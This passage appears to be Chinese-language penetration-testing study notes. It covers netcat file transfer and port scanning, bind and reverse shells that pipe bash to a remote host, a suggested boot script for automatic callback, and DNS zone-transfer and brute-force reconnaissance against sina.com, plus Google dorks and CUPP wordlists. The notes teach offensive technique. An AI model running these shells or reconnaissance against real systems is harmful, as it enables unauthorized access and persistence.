0x01 基础命令
-
服务器1接受
nc -l -p 333 | 1.ps -L //监听 -P打开端口333
-
服务器2发送
ps aux | nc -vn 192.168.43.121 333 -q 1
//-v更详细 -n不用域名 -q 1 传送完结束1秒 -
服务器接收
nc -l -p 333 > 1.mp4
-
服务器上传文件
nc -vn 192.168.43.121 333 <1.mp4 -q 1
//其中的1.MP4 需要来到当前的视频下 打开终端输入 -
或者服务器1做发送端
nc -l -p 3333 < 1.beat
-
接受端服务器2
nc -vn 192.168.43.121 > 1.beat
可以理解为发送文件都是从右边传过去。
传输目录 -
发送端
tar -cvf - icon/ | nc -l -p 3333 -q 1
接收端nc 192.168.43.200 3333 | tar -xvf -
-
加密传输
A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4 B:mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1
-
传输流媒体
A: cat 1.mp4 | nc -lp 333 B: nc -vn 1.1.1.1 333 | mplayer -vo x11 -cache 3000
-
扫描端口
nc -vnz 192.168.43.121 1-65535 //zero-I/O mode [used for scanning]·
-
远程连接正向
A:nc -l -p 3333 -c bash
B:nc 192.168.43.210 3333
-
远程连接逆向
A:nc -l -p 3333
B:nc 192.168.43.210 3333 -c bash
//服务器写一个开机脚本,每次开机主动连接B -
ncat ssl 加密传输
A:ncat -vnl --allow 192.168.43.210 -vnl 3333 -c bash --ssl
B:ncat -vn 192.168.43.200 3333 --ssl
-
Dig
Hardware type: Ethernet (1) 表示以太网地址
nslookup 域名解析
dig @ns2.sina.com. sina.com axfr
fierce -dnsserver 8.8.8.8 -dns sina.com.cn -wordlist a.txt • dnsdict6 -d4 -t 16 -x sina.com • dnsenum -f dnsbig.txt -dnsserver 8.8.8.8 sina.com -o sina.xml • dnsmap sina.com -w dns.txt • dnsrecon -d sina.com --lifetime 10 -t brt -D dnsbig.txt • dnsrecon -t std -d sina.com
0x02 Google搜索实例
-
语法
intitle:“login” 可以搜索带有login页面的管理页面
intext:“login.php” -
字典CUPP
cupp -i
-
图片信息查询Exiftool
exiftool a.jpg
-
cut 命令使用
0x03 四层发现
- 没有建立三次握手。
对一个主机发送SYN包,如果目标主机没有在线,不会回应包。
对一个主机发送ACK确认,如果目标主机在线,那么会发送一个RST 包终止陌生请求。 - 建立了三次握